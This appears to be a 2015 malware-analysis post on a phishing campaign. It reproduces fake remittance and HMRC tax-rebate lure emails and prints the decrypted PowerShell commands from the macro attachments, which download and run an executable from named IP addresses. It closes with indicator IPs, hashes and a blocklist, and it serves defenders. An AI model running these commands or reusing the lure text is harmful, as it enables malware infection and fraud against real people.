From: Long Fletcher
Date: 11 March 2015 at 09:44
Subject: Remittance Advice
Good Morning,
Please find attached the BACS Remittance Advice for payment made by RENEW HLDGS.
Please note this may show on your account as a payment reference of FPALSDB.
Kind Regards
Long Fletcher
Finance Coordinator
Attachment: LSDB.xls
----------
From: Vaughn Baker
Date: 11 March 2015 at 09:27
Subject: Your Remittance Advice [FPABHKZCNZ]
Good Morning,
Please find attached the BACS Remittance Advice for payment made by JD SPORTS FASHION PLC.
Please note this may show on your account as a payment reference of FPABHKZCNZ.
Kind Regards
Vaughn Baker
Senior Accountant
----------
From: HMRC
Date: 11 March 2015 at 10:04
Subject: Your Tax rebate
Dear [redacted],
After the last yearly computations of your financial functioning we have defined that you have the right to obtain a tax rebate of 934.80. Please confirm the tax rebate claim and permit us have 6-9 days so that we execute it. A rebate can be postponed for a variety of reasons. For instance confirming unfounded data or applying not in time.
To access the form for your tax rebate, view the report attached. Document Reference: (196XQBK).
Regards, HM Revenue Service. We apologize for the inconvenience.
The security and confidentiality of your personal information is important for us. If you have any questions, please either call the toll-free customer service phone number.
© 2014, all rights reserved
Sample attachment names:
HMRC: 196XQBK.xls, 89WDZ.xls
BACS: LSDB.xls, Rem_8392TN.xml (note that this is actually an Excel document, not an XML file)
All of these documents have low detection rates [1] [2] [3] [4] and contain these very similar malicious macros (containing sandbox detection algorithms) [1] [2] [3] [4] which when decrypted attempt to run the following Powershell commands:
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.39/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;These are probably compromised hosts, for the record they are:
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://93.170.123.36/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://85.143.166.190/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://46.30.42.177/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;
193.26.217.39 (Servachok Ltd, Russia)
93.170.123.36 (PE Gornostay Mikhailo Ivanovich, Ukraine)
85.143.166.190 (Pirix, Russia)
46.30.42.177 (EuroByte / Webazilla, Russia)
These download a CAB file, and then expand and execute it. This EXE has a detection rate of 4/57 and automated analysis tools [1] [2] show attempted traffic to:
95.163.121.33 (Digital Networks aka DINETHOSTING, Russia)
188.120.226.6 (TheFirst.RU, Russia)
188.165.5.194 (OVH, France)
According to this Malwr report it drops two further malicious files with the following MD5s:
c6cdf73eb5d11ac545f291bc668fd7fe
8d3a1903358c5f3700ffde113b93dea6 [VT 2/56]
Recommended blocklist:
95.163.121.0/24
188.120.226.6
188.165.5.194
193.26.217.39
93.170.123.36
85.143.166.190
46.30.42.177